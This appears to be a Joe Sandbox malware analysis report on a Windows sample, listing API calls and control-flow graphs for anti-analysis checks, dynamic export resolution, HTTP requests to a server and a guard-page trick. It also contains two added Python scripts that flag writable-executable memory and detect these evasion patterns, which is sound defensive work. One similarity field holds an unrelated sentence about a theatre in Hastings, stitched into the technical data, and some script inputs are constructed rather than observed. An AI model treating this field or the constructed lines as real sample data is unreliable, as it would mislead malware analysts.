lstrcpy 27086->27089 27087 3aee90 28 API calls 27087->27097 27090 391610 4 API calls 27088->27090 27089->27088 27090->27104 27091 3af7e2 lstrcpy 27091->27097 27092 3af924 lstrcpy 27092->27102 27093 3af99e StrCmpCA 27093->27047 27093->27102 27094 3afafc lstrcpy 27094->27097 27095 3afc3e lstrcpy 27095->27102 27096 3afcb8 StrCmpCA 27096->27051 27096->27102 27097->27037 27097->27038 27097->27039 27097->27040 27097->27041 27097->27043 27097->27046 27097->27047 27097->27048 27097->27051 27097->27053 27097->27060 27097->27063 27097->27067 27097->27070 27097->27075 27097->27077 27097->27078 27097->27082 27097->27085 27097->27087 27097->27091 27097->27094 27097->27102 27098 3af9cb lstrcpy 27098->27102 
                               … (remainder of the control-flow-graph edge list omitted; the rendered graph is not preserved). Call structure recoverable from the node labels:
                               • 394c70 (HTTP request routine): optional lstrcpy at 394c7d; call to 394bc0 (three operator new calls, lstrlen, InternetCrackUrlA at 394bd7); a chain of optional lstrcpy calls (394ccc, 394cff, 394d2f, 394d6d, 394da0); InternetOpenA and StrCmpCA at 394dac; call to 3b3e70 (lstrcpy, GetSystemTime at 3b3ed5); request-string assembly through repeated lstrlen / lstrcpy lstrcat steps (394e23 to 395113) and the helpers 3b7280 (lstrcpy), 3b72c0 (lstrcpy lstrcat) and 3b7310 (lstrlen, lstrcpy lstrcat); InternetConnectA at 395121; HttpOpenRequestA at 395150; lstrlen, lstrlen, HttpSendRequestA and InternetReadFile at 3953b1 with a read loop (InternetReadFile at 39547a, lstrcpy lstrcat at 39542e, lstrcpy at 39546b) ending in InternetCloseHandle at 39549c / 3954b1; the response path at 3954b8 calls InternetCloseHandle and CryptStringToBinaryA, then LocalAlloc at 3954e8, a second CryptStringToBinaryA at 3954ff, LocalFree on failure at 395517, and lstrlen / lstrcpy lstrcat steps (395529 to 3955c9) before returning.
                               • 3a8cc6 / 3a8ccd: the entry branches either to ExitProcess at 3a8cc6 or to a hub at 3a8ccd that runs lstrlen (3a8d06, 3a8d30, 3a8d5a, 3a8e88), nine StrCmpCA comparisons (3a8d84, 3a8da4, 3a8dbd, 3a8ddd, 3a8dfd, 3a8e1d, 3a8e3d, 3a8e56, 3a8e6f) and lstrcpy at 3a8ebb before returning at 3a8ee2.
                               • 3b278c: GetVolumeInformationA, then GetProcessHeap and RtlAllocateHeap at 3b27ec, wsprintfA at 3b2826, and 3b71e0 (lstrcpy at 3b71fc) before returning at 3b2860.
                               • 39161f: four optional lstrcpy calls (39162b, 39164d, 39166f, 391691).
                               • Further nodes: 3b31f0 GetSystemInfo wsprintfA; 3b2b60 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA; 3b2cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW; 3b33c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA; 3b3cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy; 3b2853 lstrcpy; 3ba280 __CxxFrameHandler; and nodes shown only with API counts: 3a1269 (408 API calls), 3a4c77 (295), 3a3959 (244), 3ae049 (147), 3a01d9 (126), 395869 (57), 3a8615 (48 / 49), 3b2d60 (11).
                              APIs
                              • lstrcpy.KERNEL32(00000000,?), ref: 00394C7F
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00394CD2
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00394D05
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00394D35
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00394D73
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 00394DA6
                              • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00394DB6
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: 00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
                               • Associated: 00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: lstrcpy$InternetOpen
                              • String ID: "$------
                              • API String ID: 2041821634-2370822465
                              • Opcode ID: a2175ba95b15a86119cf78d25b78952a845d4bf7fbf57412bc59da19c10cd6a6
                              • Instruction ID: 1577b475884d1180d8ce6cf3c0527ba31dd9376c58f8dc0b82914a47cd3aba3c
                              • Opcode Fuzzy Hash: a2175ba95b15a86119cf78d25b78952a845d4bf7fbf57412bc59da19c10cd6a6
                              • Instruction Fuzzy Hash: 06524B32911A16AFDF23EBA4DC49EAF77B9AF54300F194424F905AB251DB30ED46CB90
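The dump-file names in the Memory Dump Source lists carry the protection of each dumped region, and that is where the "Detected unpacking (changes PE section rights)" signature can be checked by hand: on a normally mapped PE, code pages are PAGE_EXECUTE_READ, so image-backed pages that are PAGE_EXECUTE_READWRITE have had their rights changed at runtime, and PAGE_EXECUTE_WRITECOPY means the section header itself asked for write plus execute. The script below is an added example for this report, not Joe Sandbox code; the field order it assumes for the .sdmp name (process, phase, dump id, base address, protection, state, type, index) is inferred from the names on this page and is an assumption, while the protection and type values are decoded with the documented Windows constants.

```python
"""Decode Joe Sandbox .sdmp dump names and flag writable+executable image pages.

Added example, not part of the report or of Joe Sandbox. The .sdmp field order
(process, phase, dump id, base, protection, state, type, index) is an assumption
inferred from the names on this page; PAGE_* and MEM_IMAGE are Windows constants.
"""
import re

PAGE_EXECUTE_READWRITE, PAGE_EXECUTE_WRITECOPY = 0x40, 0x80
PAGE_GUARD, MEM_IMAGE = 0x100, 0x1000000
PAGE_NAMES = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
              0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
              0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
SDMP_NAME = re.compile(
    r"^(?P<proc>[0-9a-f]{8})\.(?P<phase>[0-9a-f]{8})\.(?P<dump>\d+)\.(?P<base>[0-9a-f]{16})"
    r"\.(?P<prot>[0-9a-f]{8})\.(?P<state>[0-9a-f]{8})\.(?P<type>[0-9a-f]{8})"
    r"\.(?P<idx>[0-9a-f]{8})\.sdmp$", re.IGNORECASE)


def parse_sdmp_name(name):
    """Return the decoded fields of one dump name, or None if it is not an .sdmp name."""
    m = SDMP_NAME.match(name.strip())
    if not m:
        return None
    prot = int(m["prot"], 16)
    base_name = PAGE_NAMES.get(prot & 0xFF, f"0x{prot & 0xFF:x}")
    return {
        "process": int(m["proc"], 16), "phase": int(m["phase"], 16),
        "base": int(m["base"], 16), "protection": prot,
        "protection_name": base_name + (" | PAGE_GUARD" if prot & PAGE_GUARD else ""),
        "image": bool(int(m["type"], 16) & MEM_IMAGE),   # MEM_IMAGE: backed by a mapped PE
    }


def writable_executable_image_regions(names):
    """Sorted (base, protection_name) for image-backed regions that are both
    writable and executable, i.e. the evidence behind "changes PE section rights"."""
    hits = []
    for name in names:
        d = parse_sdmp_name(name)
        if d and d["image"] and (d["protection"] & 0xFF) in (PAGE_EXECUTE_READWRITE,
                                                               PAGE_EXECUTE_WRITECOPY):
            hits.append((d["base"], d["protection_name"]))
    return sorted(hits)


# The seventeen dump names listed for this sample (copied from the report above).
REPORT_DUMPS = """
00000001.00000002.2252091636.0000000000390000.00000004.00000001.01000000.00000003.sdmp
00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp
00000001.00000002.2252112867.00000000003C7000.00000040.00000001.01000000.00000003.sdmp
00000001.00000002.2252112867.000000000041E000.00000040.00000001.01000000.00000003.sdmp
00000001.00000002.2252112867.0000000000426000.00000040.00000001.01000000.00000003.sdmp
00000001.00000002.2252112867.000000000043F000.00000040.00000001.01000000.00000003.sdmp
00000001.00000002.2252112867.00000000005C8000.00000040.00000001.01000000.00000003.sdmp
00000001.00000002.2252296493.00000000005DA000.00000004.00000001.01000000.00000003.sdmp
00000001.00000002.2252315569.00000000005DC000.00000040.00000001.01000000.00000003.sdmp
00000001.00000002.2252315569.0000000000758000.00000040.00000001.01000000.00000003.sdmp
00000001.00000002.2252315569.000000000082D000.00000040.00000001.01000000.00000003.sdmp
00000001.00000002.2252315569.000000000085B000.00000040.00000001.01000000.00000003.sdmp
00000001.00000002.2252315569.0000000000863000.00000040.00000001.01000000.00000003.sdmp
00000001.00000002.2252315569.0000000000872000.00000040.00000001.01000000.00000003.sdmp
00000001.00000002.2252692901.0000000000873000.00000080.00000001.01000000.00000003.sdmp
00000001.00000002.2252836077.0000000000A05000.00000040.00000001.01000000.00000003.sdmp
00000001.00000002.2252858896.0000000000A06000.00000080.00000001.01000000.00000003.sdmp
""".split()

if __name__ == "__main__":
    for base, prot in writable_executable_image_regions(REPORT_DUMPS):
        print(f"{base:08X} {prot}")
```

Run against the names above it reports fifteen of the seventeen regions: thirteen PAGE_EXECUTE_READWRITE pages from 00391000 up to 00A05000 and two PAGE_EXECUTE_WRITECOPY pages (00873000, 00A06000); only the header page at 00390000 and the page at 005DA000 are plain PAGE_READWRITE. Note that the same dump names are repeated under every function below, so the check needs to run once per report, not once per function.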

                               Control-flow Graph (rendered graph and its Executed / Not Executed colouring not preserved)
                               control_flow_graph 3b6390: reads the PEB at 3b6390-3b63bd; at 3b63c3-3b65be calls 3b62f0 and resolves 20 exports with GetProcAddress; loads five libraries with LoadLibraryA at 3b65c3-3b6623; then resolves further exports in conditionally executed blocks (one GetProcAddress at 3b6625, two at 3b6641, one at 3b6675, one at 3b6691, two at 3b66ad, the last of these resolving NtQueryInformationProcess by name) and returns at 3b66d7.
                              APIs
                              • GetProcAddress.KERNEL32(76210000,00F21638), ref: 003B63E9
                              • GetProcAddress.KERNEL32(76210000,00F21740), ref: 003B6402
                              • GetProcAddress.KERNEL32(76210000,00F21758), ref: 003B641A
                              • GetProcAddress.KERNEL32(76210000,00F21650), ref: 003B6432
                              • GetProcAddress.KERNEL32(76210000,00F28AE8), ref: 003B644B
                              • GetProcAddress.KERNEL32(76210000,00F15288), ref: 003B6463
                              • GetProcAddress.KERNEL32(76210000,00F15108), ref: 003B647B
                              • GetProcAddress.KERNEL32(76210000,00F21698), ref: 003B6494
                              • GetProcAddress.KERNEL32(76210000,00F217D0), ref: 003B64AC
                              • GetProcAddress.KERNEL32(76210000,00F21788), ref: 003B64C4
                              • GetProcAddress.KERNEL32(76210000,00F217A0), ref: 003B64DD
                              • GetProcAddress.KERNEL32(76210000,00F15128), ref: 003B64F5
                              • GetProcAddress.KERNEL32(76210000,00F217B8), ref: 003B650D
                              • GetProcAddress.KERNEL32(76210000,00F214E8), ref: 003B6526
                              • GetProcAddress.KERNEL32(76210000,00F14FE8), ref: 003B653E
                              • GetProcAddress.KERNEL32(76210000,00F21500), ref: 003B6556
                              • GetProcAddress.KERNEL32(76210000,00F21518), ref: 003B656F
                              • GetProcAddress.KERNEL32(76210000,00F14F88), ref: 003B6587
                              • GetProcAddress.KERNEL32(76210000,00F21800), ref: 003B659F
                              • GetProcAddress.KERNEL32(76210000,00F151E8), ref: 003B65B8
                              • LoadLibraryA.KERNEL32(00F21878,?,?,?,003B1C03), ref: 003B65C9
                              • LoadLibraryA.KERNEL32(00F21890,?,?,?,003B1C03), ref: 003B65DB
                              • LoadLibraryA.KERNEL32(00F21818,?,?,?,003B1C03), ref: 003B65ED
                              • LoadLibraryA.KERNEL32(00F21830,?,?,?,003B1C03), ref: 003B65FE
                              • LoadLibraryA.KERNEL32(00F217E8,?,?,?,003B1C03), ref: 003B6610
                              • GetProcAddress.KERNEL32(75B30000,00F218A8), ref: 003B662D
                              • GetProcAddress.KERNEL32(751E0000,00F21848), ref: 003B6649
                              • GetProcAddress.KERNEL32(751E0000,00F21860), ref: 003B6661
                              • GetProcAddress.KERNEL32(76910000,00F28EA8), ref: 003B667D
                              • GetProcAddress.KERNEL32(75670000,00F150A8), ref: 003B6699
                              • GetProcAddress.KERNEL32(77310000,00F28AA8), ref: 003B66B5
                              • GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 003B66CC
                              Strings
                              • NtQueryInformationProcess, xrefs: 003B66C1
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: the same sixteen associated dumps (00390000 through 00A06000) as listed under the first function above
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$LibraryLoad
                              • String ID: NtQueryInformationProcess
                              • API String ID: 2238633743-2781105232
                              • Opcode ID: e7a0b5247e1a5d46a8b49797709fa7763e1952d09237ec659edd9a041c4568ea
                              • Instruction ID: d708d6ba7dff03dd57e4a600e5e8ee6aabadb9cb64b0f01ebcf9bb4457367e27
                              • Opcode Fuzzy Hash: e7a0b5247e1a5d46a8b49797709fa7763e1952d09237ec659edd9a041c4568ea
                              • Instruction Fuzzy Hash: 5DA15DB5A11A00DFD754DF64EC8CE263BB9F7A8740304851AE956E3360EB34A808FB60

                               Control-flow Graph (rendered graph and its Executed / Not Executed colouring not preserved)
                               control_flow_graph 3b1bf0: calls 392a90 and 3b6390 (the GetProcAddress resolver above) at 3b1bf0-3b1c0b, runs a small loop at 3b1c10-3b1c18, calls 392930 with an optional lstrcpy at 3b1c29; the check at 3b1c35-3b1c63 leads either to ExitProcess (3b1c65) or to GetSystemInfo at 3b1c6d, which in turn leads either to ExitProcess (3b1c7d) or onward; 3b1c85-3b1ca0 calls 391030 (GetCurrentProcess, VirtualAllocExNuma, ExitProcess on failure) and 3910c0 (GlobalMemoryStatusEx, ExitProcess), then GetUserDefaultLangID, after which 3b1ca2 leads either to ExitProcess (3b1cb0) or to 3b1cb8 (calls 3b2ad0 and 3b3e10); 3b1ccc calls 3b2a40 and 3b3e10 with another ExitProcess at 3b1ce0; 3b1ce7-3b1e04 builds a string through repeated lstrlen / 392930 / lstrcpy lstrcat steps; 3b1e30-3b1e66 calls 392a20 five times and OpenEventA; when OpenEventA returns a handle the loop at 3b1e68-3b1e8a runs CloseHandle, Sleep and OpenEventA again, otherwise 3b1e8c-3b1ea0 calls CreateEventA, 3b1b20 and 3affd0; both paths end in CloseHandle and ExitProcess at 3b1ea5.
                              APIs
                                • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F21638), ref: 003B63E9
                                • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F21740), ref: 003B6402
                                • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F21758), ref: 003B641A
                                • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F21650), ref: 003B6432
                                • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F28AE8), ref: 003B644B
                                • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F15288), ref: 003B6463
                                • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F15108), ref: 003B647B
                                • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F21698), ref: 003B6494
                                • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F217D0), ref: 003B64AC
                                • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F21788), ref: 003B64C4
                                • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F217A0), ref: 003B64DD
                                • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F15128), ref: 003B64F5
                                • Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F217B8), ref: 003B650D
                              • lstrcpy.KERNEL32(00000000,003BCFEC), ref: 003B1C2F
                              • ExitProcess.KERNEL32 ref: 003B1C67
                              • GetSystemInfo.KERNEL32(?), ref: 003B1C71
                              • ExitProcess.KERNEL32 ref: 003B1C7F
                                • Part of subcall function 00391030: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 00391046
                                • Part of subcall function 00391030: VirtualAllocExNuma.KERNEL32(00000000), ref: 0039104D
                                • Part of subcall function 00391030: ExitProcess.KERNEL32 ref: 00391058
                                • Part of subcall function 003910C0: GlobalMemoryStatusEx.KERNEL32 ref: 003910EA
                                • Part of subcall function 003910C0: ExitProcess.KERNEL32 ref: 00391114
                              • GetUserDefaultLangID.KERNEL32 ref: 003B1C8F
                              • ExitProcess.KERNEL32 ref: 003B1CB2
                              • ExitProcess.KERNEL32 ref: 003B1CE1
                              • lstrlen.KERNEL32(00F28C18), ref: 003B1CEE
                              • lstrcpy.KERNEL32(00000000,?), ref: 003B1D15
                              • lstrcat.KERNEL32(00000000,00F28C18), ref: 003B1D1D
                              • lstrlen.KERNEL32(003C4B98), ref: 003B1D28
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1D48
                              • lstrcat.KERNEL32(00000000,003C4B98), ref: 003B1D54
                              • lstrlen.KERNEL32(00000000), ref: 003B1D63
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1D89
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003B1D94
                              • lstrlen.KERNEL32(003C4B98), ref: 003B1D9F
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1DBC
                              • lstrcat.KERNEL32(00000000,003C4B98), ref: 003B1DC8
                              • lstrlen.KERNEL32(00000000), ref: 003B1DD7
                              • lstrcpy.KERNEL32(00000000,00000000), ref: 003B1DF9
                              • lstrcat.KERNEL32(00000000,00000000), ref: 003B1E04
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: the same sixteen associated dumps (00390000 through 00A06000) as listed under the first function above
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AddressProc$Process$Exitlstrcpy$lstrcatlstrlen$AllocCurrentDefaultGlobalInfoLangMemoryNumaStatusSystemUserVirtual
                              • String ID:
                              • API String ID: 3366406952-0
                              • Opcode ID: 4df5b91fc4a8364dadf96506fdc1bb61e4bc343f601ff994a1065cb9a125a544
                              • Instruction ID: 18b11a7b9db51c08c13bcce16dd41c21157b242566a7026faa6985082c7abb0f
                              • Opcode Fuzzy Hash: 4df5b91fc4a8364dadf96506fdc1bb61e4bc343f601ff994a1065cb9a125a544
                              • Instruction Fuzzy Hash: 2371A131501A16AFDB22ABB0DC5DFBF7A79AF60705F450028FA06AA591DF30DD05DB60
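The three function entries above describe, in the report's API-list form, the patterns a triage analyst looks for in this family: an environment probe (GetSystemInfo, VirtualAllocExNuma, GlobalMemoryStatusEx, GetUserDefaultLangID) followed by ExitProcess in 3b1bf0, the WinINet request chain in 394c70, twenty GetProcAddress resolutions plus a lookup of NtQueryInformationProcess by name in 3b6390, and the OpenEventA / CreateEventA single-instance guard. The script below is an added example, not Joe Sandbox code and not part of the sample: it parses lines in the report's own "Api.MODULE(args), ref: addr" format, attributes "Part of subcall function" lines to the callee, and evaluates those sequence rules. Lines with real ref values are copied from this page; the lines marked constructed use the address of the control-flow-graph block containing the call, because the report gives no exact ref for them, and the GetProcAddress name pointers are replaced with "?".

```python
"""Sequence-rule triage over Joe Sandbox per-function API listings.

Added example for this report; not Joe Sandbox code and not part of the sample.
Rules: environment probe followed by ExitProcess, the WinINet request chain,
bulk GetProcAddress use, export resolved by name, OpenEventA/CreateEventA guard.
"""
import re
from collections import defaultdict

API_LINE = re.compile(
    r"^\s*•?\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)")
HEX8 = re.compile(r"[0-9A-Fa-f]{8}")
ENV_PROBES = {"GetSystemInfo", "GlobalMemoryStatusEx", "GetUserDefaultLangID", "VirtualAllocExNuma"}
WININET_CHAIN = ("InternetOpenA", "InternetConnectA", "HttpOpenRequestA",
                 "HttpSendRequestA", "InternetReadFile")


def norm(addr):
    """Upper-case hex without leading zeros: '003B1C67' -> '3B1C67'."""
    return f"{int(addr, 16):X}"


def parse_api_listing(function_addr, text):
    """Yield (function, api, module, args, ref); subcall lines go to the callee."""
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = tuple(a.strip() for a in (m["args"] or "").split(",") if a.strip())
        yield norm(m["sub"] or function_addr), m["api"], m["mod"].upper(), args, norm(m["ref"])


def in_order(apis, chain):
    """True when every name in chain occurs in apis in that relative order."""
    it = iter(apis)
    return all(any(seen == want for seen in it) for want in chain)


def triage(listings):
    """listings maps a function address to its API section text; returns sorted
    (function, rule, detail). A (function, api, ref) seen twice is kept once,
    because subcall lines repeat the callee's own listing."""
    by_func, seen = defaultdict(list), set()
    for func_addr, text in listings.items():
        for func, api, _mod, args, ref in parse_api_listing(func_addr, text):
            if (func, api, ref) not in seen:
                seen.add((func, api, ref))
                by_func[func].append((api, args, ref))
    findings = set()
    for func, calls in by_func.items():
        apis = [api for api, _, _ in calls]
        for i, (api, args, ref) in enumerate(calls):
            # The listing is in address order, not execution order, so "followed
            # by" means "at a higher address inside the same function".
            if api in ENV_PROBES and "ExitProcess" in apis[i + 1:]:
                findings.add((func, "env_probe_then_exit", f"{api}@{ref}"))
            if api == "GetProcAddress":
                for name in args[1:]:                 # second argument is lpProcName
                    if name != "?" and not HEX8.fullmatch(name):
                        findings.add((func, "resolves_named_export", name))
        if in_order(apis, WININET_CHAIN):
            findings.add((func, "wininet_http_chain", "->".join(WININET_CHAIN)))
        if apis.count("GetProcAddress") >= 20:
            findings.add((func, "bulk_getprocaddress", f"{apis.count('GetProcAddress')} calls"))
        if in_order(apis, ("OpenEventA", "CreateEventA")):
            findings.add((func, "single_instance_event", "OpenEventA->CreateEventA"))
    return sorted(findings)


# Real refs for the 20 GetProcAddress sites of 3b6390 (name pointers elided as "?").
GPA_REFS = ("3E9", "402", "41A", "432", "44B", "463", "47B", "494", "4AC", "4C4",
            "4DD", "4F5", "50D", "526", "53E", "556", "56F", "587", "59F", "5B8")
SAMPLE = {
    "003B1BF0": """
• Part of subcall function 003B6390: GetProcAddress.KERNEL32(76210000,00F21638), ref: 003B63E9
• ExitProcess.KERNEL32 ref: 003B1C67
• GetSystemInfo.KERNEL32(?), ref: 003B1C71
• ExitProcess.KERNEL32 ref: 003B1C7F
• Part of subcall function 00391030: VirtualAllocExNuma.KERNEL32(00000000), ref: 0039104D
• Part of subcall function 00391030: ExitProcess.KERNEL32 ref: 00391058
• Part of subcall function 003910C0: GlobalMemoryStatusEx.KERNEL32 ref: 003910EA
• Part of subcall function 003910C0: ExitProcess.KERNEL32 ref: 00391114
• GetUserDefaultLangID.KERNEL32 ref: 003B1C8F
• ExitProcess.KERNEL32 ref: 003B1CB2
• OpenEventA.KERNEL32(?), ref: 003B1E30
• CreateEventA.KERNEL32(?), ref: 003B1E8C
""",  # the OpenEventA / CreateEventA lines are constructed from CFG block addresses
    "00394C70": """
• InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00394DB6
• InternetConnectA.WININET(?), ref: 00395121
• HttpOpenRequestA.WININET(?), ref: 00395150
• HttpSendRequestA.WININET(?), ref: 003953B1
• InternetReadFile.WININET(?), ref: 003953B1
""",  # everything after InternetOpenA is constructed from CFG block addresses
    "003B6390": "\n".join(f"• GetProcAddress.KERNEL32(76210000,?), ref: 003B6{r}" for r in GPA_REFS)
    + "\n• GetProcAddress.KERNEL32(77310000,NtQueryInformationProcess), ref: 003B66CC\n",
}

if __name__ == "__main__":
    for func, rule, detail in triage(SAMPLE):
        print(f"{func:>8}  {rule:<24} {detail}")
```

Two caveats for anyone adapting this to real report exports: the per-function lists are sorted by call-site address, so the "followed by" rules approximate control flow and should be confirmed against the graph (for 3b1bf0 the graph does show each probe branching to an ExitProcess block), and the GetProcAddress threshold of 20 is an arbitrary cut-off chosen to match this report; 3b66e0 below would trip it with over a hundred sites.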

                               Control-flow Graph (rendered graph and its Executed / Not Executed colouring not preserved)
                               control_flow_graph 394a60: RtlAllocateHeap at 394a60-394afc, then either directly or through the block 394afe-394b78 to VirtualProtect at 394b7a-394bbe (flNewProtect 0x100 in the API list below, i.e. PAGE_GUARD, the guard-page trick named in the signatures).
                              APIs
                              • RtlAllocateHeap.NTDLL(00000000), ref: 00394AA2
                              • VirtualProtect.KERNEL32(00000000,00000004,00000100,?), ref: 00394BB0
                              Strings
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: the same sixteen associated dumps (00390000 through 00A06000) as listed under the first function above
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: AllocateHeapProtectVirtual
                              • String ID: The Opus Theatre was founded by British-Argentine composer and concert pianist Polo Piatti and officially opened on 7 July 2017 in Hastings, in the United Kingdom.
                              • API String ID: 1542196881-3329630956
                              • Opcode ID: 625f5340285d87f9147408177074ac64af23cb9aac2782633e90005779484e99
                              • Instruction ID: 8ba2530dcde0a6488c98b0233ccb72e1da0b9a0cb0e60914985f5731bc38d4ca
                              • Opcode Fuzzy Hash: 625f5340285d87f9147408177074ac64af23cb9aac2782633e90005779484e99
                              • Instruction Fuzzy Hash: 5231CE29B8023C769622EBEF4C67F9F6E55DF85BA0B02405AF548D71818BB15D01CBA2
                              APIs
                              • GetProcessHeap.KERNEL32(00000000,00000104,00000000,00000000,?), ref: 003B2A6F
                              • RtlAllocateHeap.NTDLL(00000000), ref: 003B2A76
                              • GetUserNameA.ADVAPI32(00000000,00000104), ref: 003B2A8A
                              Memory Dump Source
                              • Source File: 00000001.00000002.2252112867.0000000000391000.00000040.00000001.01000000.00000003.sdmp, Offset: 00390000, based on PE: true
                               • Associated: the same sixteen associated dumps (00390000 through 00A06000) as listed under the first function above
                              Joe Sandbox IDA Plugin
                              • Snapshot File: hcaresult_1_2_390000_file.jbxd
                              Yara matches
                              Similarity
                              • API ID: Heap$AllocateNameProcessUser
                              • String ID:
                              • API String ID: 1296208442-0
                              • Opcode ID: 272cefa2a1785e182c0e61769c60fe5ce1a9c4ff203373a2127a1df0429e502a
                              • Instruction ID: 6803c4045d84f989eb570572f6d232e9c1a553c43e14f5da9e4a4e2b48017651
                              • Opcode Fuzzy Hash: 272cefa2a1785e182c0e61769c60fe5ce1a9c4ff203373a2127a1df0429e502a
                              • Instruction Fuzzy Hash: 50F0B4B5A40A04AFC700DF88DD49F9EBBBCF704B21F000216FA15E3680D774190486A1

                              Control-flow Graph

                              • Executed
                              • Not Executed
                              control_flow_graph 633 3b66e0-3b66e7 634 3b6afe-3b6b92 LoadLibraryA * 8 633->634 635 3b66ed-3b6af9 GetProcAddress * 43 633->635 636 3b6c08-3b6c0f 634->636 637 3b6b94-3b6c03 GetProcAddress * 5 634->637 635->634 638 3b6cd2-3b6cd9 636->638 639 3b6c15-3b6ccd GetProcAddress * 8 636->639 637->636 640 3b6cdb-3b6d4a GetProcAddress * 5 638->640 641 3b6d4f-3b6d56 638->641 639->638 640->641 642 3b6de9-3b6df0 641->642 643 3b6d5c-3b6de4 GetProcAddress * 6 641->643 644 3b6f10-3b6f17 642->644 645 3b6df6-3b6f0b GetProcAddress * 12 642->645 643->642 646 3b6f19-3b6f88 GetProcAddress * 5 644->646 647 3b6f8d-3b6f94 644->647 645->644 646->647 648 3b6fc1-3b6fc8 647->648 649 3b6f96-3b6fbc GetProcAddress * 2 647->649 650 3b6fca-3b6ff0 GetProcAddress * 2 648->650 651 3b6ff5-3b6ffc 648->651 649->648 650->651 652 3b70ed-3b70f4 651->652 653 3b7002-3b70e8 GetProcAddress * 10 651->653 654 3b7152-3b7159 652->654 655 3b70f6-3b714d GetProcAddress * 4 652->655 653->652 656 3b715b-3b7169 GetProcAddress 654->656 657 3b716e-3b7175 654->657 655->654 656->657 658 3b71d3 657->658 659 3b7177-3b71ce GetProcAddress * 4 657->659 659->658
                              APIs
                              • GetProcAddress.KERNEL32(76210000,00F15228), ref: 003B66F5
